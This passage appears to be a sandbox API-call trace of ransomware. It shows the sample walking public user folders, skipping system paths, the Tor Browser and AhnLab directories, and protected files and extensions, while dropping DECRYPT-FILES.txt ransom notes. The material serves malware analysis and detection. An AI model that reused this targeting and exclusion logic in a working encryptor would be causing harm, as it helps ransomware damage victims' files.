param_1="C:\\Users\\Public\\Documents\\My Videos\\\\DECRYPT-FILES.txt") returned 54 [0186.740] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Videos\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\documents\\my videos\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.740] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Videos\\") returned 36 [0186.740] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Videos\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos\\*") returned="C:\\Users\\Public\\Documents\\My Videos\\*" [0186.740] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x11, ftLastAccessTime.dwHighDateTime=0x2, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0186.740] CloseHandle (hObject=0x25c) returned 1 [0186.740] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos\\", cAlternateFileName="MYVIDE~1")) returned 0 [0186.740] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0186.741] CloseHandle (hObject=0x254) returned 1 [0186.741] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f9c6e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f9c6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0186.741] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0186.741] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0186.741] lstrcatW (in: lpString1="Downloads", lpString2="\\" | out: lpString1="Downloads\\") returned="Downloads\\" [0186.741] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Downloads\\" | out: lpString1="C:\\Users\\Public\\Downloads\\") returned="C:\\Users\\Public\\Downloads\\" [0186.741] StrStrW (lpFirst="C:\\Users\\Public\\Downloads\\", lpSrch="\\Program Files") returned 0x0 [0186.741] StrStrW (lpFirst="C:\\Users\\Public\\Downloads\\", lpSrch=":\\Windows") returned 0x0 [0186.741] StrStrW (lpFirst="C:\\Users\\Public\\Downloads\\", lpSrch="\\Games\\") returned 0x0 [0186.741] StrStrW (lpFirst="C:\\Users\\Public\\Downloads\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.741] StrStrW (lpFirst="C:\\Users\\Public\\Downloads\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.741] StrStrW (lpFirst="C:\\Users\\Public\\Downloads\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.741] StrStrW (lpFirst="C:\\Users\\Public\\Downloads\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.741] StrStrW (lpFirst="C:\\Users\\Public\\Downloads\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.741] StrStrW (lpFirst="C:\\Users\\Public\\Downloads\\", lpSrch="\\All Users") returned 0x0 [0186.741] StrStrW (lpFirst="C:\\Users\\Public\\Downloads\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.741] StrStrW (lpFirst="C:\\Users\\Public\\Downloads\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.741] StrStrW (lpFirst="C:\\Users\\Public\\Downloads\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.741] StrStrW (lpFirst="C:\\Users\\Public\\Downloads\\", lpSrch="AhnLab") returned 0x0 [0186.741] StrStrW (lpFirst="C:\\Users\\Public\\Downloads\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.741] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\") returned 26 [0186.741] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.741] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Downloads\\\\0a16c9.tmp") returned 37 [0186.741] CreateFileW (lpFileName="C:\\Users\\Public\\Downloads\\\\0a16c9.tmp" (normalized: "c:\\users\\public\\downloads\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0186.742] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\") returned 26 [0186.742] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.742] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Downloads\\\\DECRYPT-FILES.txt") returned 44 [0186.742] CreateFileW (lpFileName="C:\\Users\\Public\\Downloads\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\downloads\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.742] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\") returned 26 [0186.742] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Downloads\\*") returned="C:\\Users\\Public\\Downloads\\*" [0186.742] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf2043a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf2043a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0186.742] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.742] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf2043a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf2043a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.742] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.742] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.742] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2043a80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf2043a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf2043a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0186.742] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0186.742] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0186.742] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0186.742] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0186.742] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0186.742] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0186.742] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0186.742] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0186.742] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0186.742] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0186.742] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.742] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0186.742] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0186.742] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0186.742] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0186.742] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\") returned 26 [0186.743] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.743] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\Public\\Downloads\\" | out: lpString1="C:\\Users\\Public\\Downloads\\") returned="C:\\Users\\Public\\Downloads\\" [0186.743] lstrcatW (in: lpString1="C:\\Users\\Public\\Downloads\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\Public\\Downloads\\0a16c9.tmp") returned="C:\\Users\\Public\\Downloads\\0a16c9.tmp" [0186.743] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.743] CreateFileW (lpFileName="C:\\Users\\Public\\Downloads\\0a16c9.tmp" (normalized: "c:\\users\\public\\downloads\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.743] CloseHandle (hObject=0x0) returned 0 [0186.743] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.743] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0f9c6e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0f9c6e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f9c6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.743] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.743] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28351f0f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.743] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.743] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.743] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.743] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.743] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28351f0f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0186.743] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0186.743] CloseHandle (hObject=0x254) returned 1 [0186.744] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f9c6e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f9c6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0186.744] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0186.744] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0186.744] lstrcatW (in: lpString1="Favorites", lpString2="\\" | out: lpString1="Favorites\\") returned="Favorites\\" [0186.744] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Favorites\\" | out: lpString1="C:\\Users\\Public\\Favorites\\") returned="C:\\Users\\Public\\Favorites\\" [0186.744] StrStrW (lpFirst="C:\\Users\\Public\\Favorites\\", lpSrch="\\Program Files") returned 0x0 [0186.744] StrStrW (lpFirst="C:\\Users\\Public\\Favorites\\", lpSrch=":\\Windows") returned 0x0 [0186.744] StrStrW (lpFirst="C:\\Users\\Public\\Favorites\\", lpSrch="\\Games\\") returned 0x0 [0186.744] StrStrW (lpFirst="C:\\Users\\Public\\Favorites\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.744] StrStrW (lpFirst="C:\\Users\\Public\\Favorites\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.744] StrStrW (lpFirst="C:\\Users\\Public\\Favorites\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.744] StrStrW (lpFirst="C:\\Users\\Public\\Favorites\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.744] StrStrW (lpFirst="C:\\Users\\Public\\Favorites\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.744] StrStrW (lpFirst="C:\\Users\\Public\\Favorites\\", lpSrch="\\All Users") returned 0x0 [0186.744] StrStrW (lpFirst="C:\\Users\\Public\\Favorites\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.744] StrStrW (lpFirst="C:\\Users\\Public\\Favorites\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.744] StrStrW (lpFirst="C:\\Users\\Public\\Favorites\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.744] StrStrW (lpFirst="C:\\Users\\Public\\Favorites\\", lpSrch="AhnLab") returned 0x0 [0186.744] StrStrW (lpFirst="C:\\Users\\Public\\Favorites\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.744] lstrlenW (lpString="C:\\Users\\Public\\Favorites\\") returned 26 [0186.744] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.744] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Favorites\\\\0a16c9.tmp") returned 37 [0186.744] CreateFileW (lpFileName="C:\\Users\\Public\\Favorites\\\\0a16c9.tmp" (normalized: "c:\\users\\public\\favorites\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0186.745] lstrlenW (lpString="C:\\Users\\Public\\Favorites\\") returned 26 [0186.745] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.745] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Favorites\\\\DECRYPT-FILES.txt") returned 44 [0186.745] CreateFileW (lpFileName="C:\\Users\\Public\\Favorites\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\favorites\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.745] lstrlenW (lpString="C:\\Users\\Public\\Favorites\\") returned 26 [0186.745] lstrcatW (in: lpString1="C:\\Users\\Public\\Favorites\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Favorites\\*") returned="C:\\Users\\Public\\Favorites\\*" [0186.745] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Favorites\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf2043a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf2043a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0186.745] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.745] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf2043a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf2043a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.745] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.745] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.745] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2043a80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf2043a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf2043a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0186.745] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0186.745] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0186.745] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0186.745] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0186.745] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0186.745] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0186.745] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0186.745] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0186.745] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0186.745] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0186.745] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.745] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0186.745] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0186.745] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0186.745] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0186.746] lstrlenW (lpString="C:\\Users\\Public\\Favorites\\") returned 26 [0186.746] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.746] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\Public\\Favorites\\" | out: lpString1="C:\\Users\\Public\\Favorites\\") returned="C:\\Users\\Public\\Favorites\\" [0186.746] lstrcatW (in: lpString1="C:\\Users\\Public\\Favorites\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\Public\\Favorites\\0a16c9.tmp") returned="C:\\Users\\Public\\Favorites\\0a16c9.tmp" [0186.746] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.746] CreateFileW (lpFileName="C:\\Users\\Public\\Favorites\\0a16c9.tmp" (normalized: "c:\\users\\public\\favorites\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.746] CloseHandle (hObject=0x0) returned 0 [0186.746] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.746] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0f9c6e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0f9c6e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f9c6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.746] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.746] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0f9c6e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0f9c6e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f9c6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0186.746] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0186.746] CloseHandle (hObject=0x254) returned 1 [0186.746] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0fc2840, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0fc2840, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0186.746] lstrcmpW (lpString1="Libraries", lpString2=".") returned 1 [0186.747] lstrcmpW (lpString1="Libraries", lpString2="..") returned 1 [0186.747] lstrcatW (in: lpString1="Libraries", lpString2="\\" | out: lpString1="Libraries\\") returned="Libraries\\" [0186.747] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Libraries\\" | out: lpString1="C:\\Users\\Public\\Libraries\\") returned="C:\\Users\\Public\\Libraries\\" [0186.747] StrStrW (lpFirst="C:\\Users\\Public\\Libraries\\", lpSrch="\\Program Files") returned 0x0 [0186.747] StrStrW (lpFirst="C:\\Users\\Public\\Libraries\\", lpSrch=":\\Windows") returned 0x0 [0186.747] StrStrW (lpFirst="C:\\Users\\Public\\Libraries\\", lpSrch="\\Games\\") returned 0x0 [0186.747] StrStrW (lpFirst="C:\\Users\\Public\\Libraries\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.747] StrStrW (lpFirst="C:\\Users\\Public\\Libraries\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.747] StrStrW (lpFirst="C:\\Users\\Public\\Libraries\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.747] StrStrW (lpFirst="C:\\Users\\Public\\Libraries\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.747] StrStrW (lpFirst="C:\\Users\\Public\\Libraries\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.747] StrStrW (lpFirst="C:\\Users\\Public\\Libraries\\", lpSrch="\\All Users") returned 0x0 [0186.747] StrStrW (lpFirst="C:\\Users\\Public\\Libraries\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.747] StrStrW (lpFirst="C:\\Users\\Public\\Libraries\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.747] StrStrW (lpFirst="C:\\Users\\Public\\Libraries\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.747] StrStrW (lpFirst="C:\\Users\\Public\\Libraries\\", lpSrch="AhnLab") returned 0x0 [0186.747] StrStrW (lpFirst="C:\\Users\\Public\\Libraries\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.747] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\") returned 26 [0186.747] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.747] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Libraries\\\\0a16c9.tmp") returned 37 [0186.747] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\\\0a16c9.tmp" (normalized: "c:\\users\\public\\libraries\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x254 [0186.749] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\") returned 26 [0186.749] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.749] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Libraries\\\\DECRYPT-FILES.txt") returned 44 [0186.749] CreateFileW (lpFileName="C:\\Users\\Public\\Libraries\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\libraries\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.750] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\") returned 26 [0186.750] lstrcatW (in: lpString1="C:\\Users\\Public\\Libraries\\", lpString2="*" | out: lpString1="C:\\Users\\Public\\Libraries\\*") returned="C:\\Users\\Public\\Libraries\\*" [0186.750] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf2043a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf2043a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0186.750] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.750] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf2043a80, 